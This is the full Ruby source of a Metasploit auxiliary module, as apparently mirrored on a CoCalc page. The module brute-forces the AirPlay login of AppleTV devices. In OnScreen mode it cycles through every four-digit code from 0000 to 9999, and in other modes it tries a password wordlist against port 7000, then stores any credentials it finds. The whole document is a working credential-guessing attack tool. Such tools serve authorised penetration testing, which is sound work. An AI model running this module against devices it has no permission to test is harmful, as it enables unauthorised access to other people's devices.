CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/auxiliary/scanner/http/appletv_login.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45require 'metasploit/framework/credential_collection'6require 'metasploit/framework/login_scanner/http'78class MetasploitModule < Msf::Auxiliary9include Msf::Exploit::Remote::HttpClient10include Msf::Auxiliary::Report11include Msf::Auxiliary::AuthBrute12include Msf::Auxiliary::Scanner1314def initialize15super(16'Name' => 'AppleTV AirPlay Login Utility',17'Description' => %q(18This module attempts to authenticate to an AppleTV service with19the username, 'AirPlay'. The device has two different access control20modes: OnScreen and Password. The difference between the two is the21password in OnScreen mode is numeric-only and four digits long, which22means when this option is enabled, this option, the module will make23sure to cover all of them - from 0000 to 9999. The Password mode is24more complex, therefore the usual online bruteforce strategies apply.25),26'Author' =>27[28'0a29406d9794e4f9b30b3c5d6702c708', # Original29'thelightcosine' # LoginScanner conversion help30],31'License' => MSF_LICENSE,32'References' =>33[34['URL', 'http://nto.github.io/AirPlay.html']35],36'DefaultOptions' => {37'RPORT' => 7000, # AppleTV's server38'STOP_ON_SUCCESS' => true # There's only one password with the same username39}40)4142register_options(43[44OptBool.new('Onscreen', [false, 'Enable if AppleTV is using the Onscreen access control', false]),45OptPath.new('PASS_FILE', [46false,47'File containing passwords, one per line',48File.join(Msf::Config.data_directory, 'wordlists', 'http_default_pass.txt')49]50)])5152deregister_options(53'USERNAME', 'USER_AS_PASS', 'DB_ALL_CREDS', 'DB_ALL_USERS', 'DB_SKIP_EXISTING',54'NTLM::SendLM', 'NTLM::SendNTLM', 'NTLM::SendSPN', 'NTLM::UseLMKey', 'NTLM::UseNTLM2_session', 'NTLM::UseNTLMv2',55'REMOVE_USERPASS_FILE', 'REMOVE_USER_FILE', 'DOMAIN', 'HttpUsername'56)57end5859def run_host(ip)60uri = "/stop"61if datastore['PASS_FILE'] && !datastore['PASS_FILE'].empty?62print_status("Attempting to login to #{uri} using password list")63cred_collection = Metasploit::Framework::CredentialCollection.new(64blank_passwords: datastore['BLANK_PASSWORDS'],65pass_file: datastore['PASS_FILE'],66username: 'AirPlay',67user_as_pass: datastore['USER_AS_PASS'],68)69cred_collection = prepend_db_passwords(cred_collection)70else71print_status("Attempting to login to #{uri} by 'Onscreen Code'")72cred_collection = LockCodeCollection.new73end7475scanner = Metasploit::Framework::LoginScanner::HTTP.new(76configure_http_login_scanner(77uri: "/stop",78cred_details: cred_collection,79stop_on_success: datastore['STOP_ON_SUCCESS'],80bruteforce_speed: datastore['BRUTEFORCE_SPEED'],81connection_timeout: 5,82)83)8485scanner.scan! do |result|86credential_data = result.to_h87credential_data.merge!(88module_fullname: self.fullname,89workspace_id: myworkspace_id,90service_name: 'airplay'91)92case result.status93when Metasploit::Model::Login::Status::SUCCESSFUL94print_brute :level => :good, :ip => ip, :msg => "Success: '#{result.credential}'"95credential_core = create_credential(credential_data)96credential_data[:core] = credential_core97create_credential_login(credential_data)98:next_user99when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT100print_brute :level => :verror, :ip => ip, :msg => "Could not connect"101invalidate_login(credential_data)102:abort103when Metasploit::Model::Login::Status::INCORRECT104print_brute :level => :verror, :ip => ip, :msg => "Failed: '#{result.credential}'"105invalidate_login(credential_data)106when Metasploit::Model::Login::Status::NO_AUTH_REQUIRED107print_brute :level => :error, :ip => ip, :msg => "NO AUTH REQUIRED: '#{result.credential}'"108break109end110end111end112113# This class is just a faster way of doing our LockCode enumeration. We could just stick this into114# a CredentialCollection, but since we have a pre-set range we iterate through, it is easier to do it115# at runtime.116class LockCodeCollection117118def each119(0..9999).each do |pass|120screen_code = Metasploit::Framework::Credential.new(public: 'AirPlay', private: pass.to_s.rjust(4, '0'), realm: nil, private_type: :password )121yield screen_code122end123end124end125end126127128